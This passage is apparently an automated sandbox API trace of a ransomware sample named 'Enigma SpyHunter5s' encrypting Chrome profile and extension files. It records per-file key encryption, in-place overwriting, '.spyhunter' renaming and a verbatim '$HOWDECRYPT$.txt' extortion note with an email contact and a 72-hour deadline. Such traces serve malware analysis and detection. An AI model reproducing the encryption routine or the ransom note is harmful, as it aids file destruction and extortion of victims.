[0156.633] GetProcessHeap () returned 0x2c0000 [0156.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.633] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb34*=0x2800, lpOverlapped=0x0) returned 1 [0156.829] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.829] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb34*=0x2800, lpOverlapped=0x0) returned 1 [0156.830] GetProcessHeap () returned 0x2c0000 [0156.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.830] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.830] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x57eb74*, lpNumberOfBytesWritten=0x57eb34*=0x4, lpOverlapped=0x0) returned 1 [0156.834] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb34*=0x30, lpOverlapped=0x0) returned 1 [0156.834] CloseHandle (hObject=0x9c) returned 1 [0156.834] GetProcessHeap () returned 0x2c0000 [0156.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.834] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.spyhunter") returned 108 [0156.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.spyhunter")) returned 1 [0156.835] GetProcessHeap () returned 0x2c0000 [0156.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.835] GetProcessHeap () returned 0x2c0000 [0156.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.835] GetProcessHeap () returned 0x2c0000 [0156.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29c00 | out: hHeap=0x2c0000) returned 1 [0156.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.836] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.836] WriteFile (in: hFile=0x9c, lpBuffer=0x57eaa7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebd0, lpOverlapped=0x0 | out: lpBuffer=0x57eaa7*, lpNumberOfBytesWritten=0x57ebd0*=0x127, lpOverlapped=0x0) returned 1 [0156.837] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.837] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebd0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebd0*=0x2ac, lpOverlapped=0x0) returned 1 [0156.837] CloseHandle (hObject=0x9c) returned 1 [0156.837] GetProcessHeap () returned 0x2c0000 [0156.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fba210 | out: hHeap=0x2c0000) returned 1 [0156.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.838] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.838] WriteFile (in: hFile=0x9c, lpBuffer=0x57eaa3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x57eaa3*, lpNumberOfBytesWritten=0x57ebcc*=0x127, lpOverlapped=0x0) returned 1 [0156.839] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.839] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebcc*=0x2ac, lpOverlapped=0x0) returned 1 [0156.840] CloseHandle (hObject=0x9c) returned 1 [0156.840] GetProcessHeap () returned 0x2c0000 [0156.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb82b8 | out: hHeap=0x2c0000) returned 1 [0156.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb68 | out: pbBuffer=0x57eb68) returned 1 [0156.840] GetProcessHeap () returned 0x2c0000 [0156.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb60*=0x30) returned 1 [0156.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.841] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0156.841] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0156.841] GetProcessHeap () returned 0x2c0000 [0156.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.841] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eb24*=0x2800, lpOverlapped=0x0) returned 1 [0157.034] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.034] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eb24*=0x2800, lpOverlapped=0x0) returned 1 [0157.034] GetProcessHeap () returned 0x2c0000 [0157.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.034] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.034] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb24, lpOverlapped=0x0 | out: lpBuffer=0x57eb64*, lpNumberOfBytesWritten=0x57eb24*=0x4, lpOverlapped=0x0) returned 1 [0157.035] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb24*=0x30, lpOverlapped=0x0) returned 1 [0157.035] CloseHandle (hObject=0x9c) returned 1 [0157.035] GetProcessHeap () returned 0x2c0000 [0157.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.035] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 177 [0157.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0157.036] GetProcessHeap () returned 0x2c0000 [0157.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.036] GetProcessHeap () returned 0x2c0000 [0157.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.036] GetProcessHeap () returned 0x2c0000 [0157.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fba078 | out: hHeap=0x2c0000) returned 1 [0157.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.037] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.038] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea9b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x57ea9b*, lpNumberOfBytesWritten=0x57ebc4*=0x127, lpOverlapped=0x0) returned 1 [0157.038] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.038] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebc4*=0x2ac, lpOverlapped=0x0) returned 1 [0157.038] CloseHandle (hObject=0x9c) returned 1 [0157.039] GetProcessHeap () returned 0x2c0000 [0157.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8ed0 | out: hHeap=0x2c0000) returned 1 [0157.039] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb60 | out: pbBuffer=0x57eb60) returned 1 [0157.039] GetProcessHeap () returned 0x2c0000 [0157.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.039] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb58*=0x30) returned 1 [0157.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0157.040] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.040] GetProcessHeap () returned 0x2c0000 [0157.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.040] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eb1c*=0x2800, lpOverlapped=0x0) returned 1 [0157.172] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.172] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eb1c*=0x2800, lpOverlapped=0x0) returned 1 [0157.172] GetProcessHeap () returned 0x2c0000 [0157.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.172] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.173] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb1c, lpOverlapped=0x0 | out: lpBuffer=0x57eb5c*, lpNumberOfBytesWritten=0x57eb1c*=0x4, lpOverlapped=0x0) returned 1 [0157.173] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb1c*=0x30, lpOverlapped=0x0) returned 1 [0157.173] CloseHandle (hObject=0x9c) returned 1 [0157.173] GetProcessHeap () returned 0x2c0000 [0157.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.173] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.spyhunter") returned 174 [0157.173] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.spyhunter")) returned 1 [0157.176] GetProcessHeap () returned 0x2c0000 [0157.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.176] GetProcessHeap () returned 0x2c0000 [0157.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.176] GetProcessHeap () returned 0x2c0000 [0157.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8d38 | out: hHeap=0x2c0000) returned 1 [0157.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.177] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.177] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea93*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebbc, lpOverlapped=0x0 | out: lpBuffer=0x57ea93*, lpNumberOfBytesWritten=0x57ebbc*=0x127, lpOverlapped=0x0) returned 1 [0157.178] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.178] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebbc*=0x2ac, lpOverlapped=0x0) returned 1 [0157.179] CloseHandle (hObject=0x9c) returned 1 [0157.179] GetProcessHeap () returned 0x2c0000 [0157.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8870 | out: hHeap=0x2c0000) returned 1 [0157.179] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb58 | out: pbBuffer=0x57eb58) returned 1 [0157.179] GetProcessHeap () returned 0x2c0000 [0157.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.179] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb50*=0x30) returned 1 [0157.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0157.180] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.180] 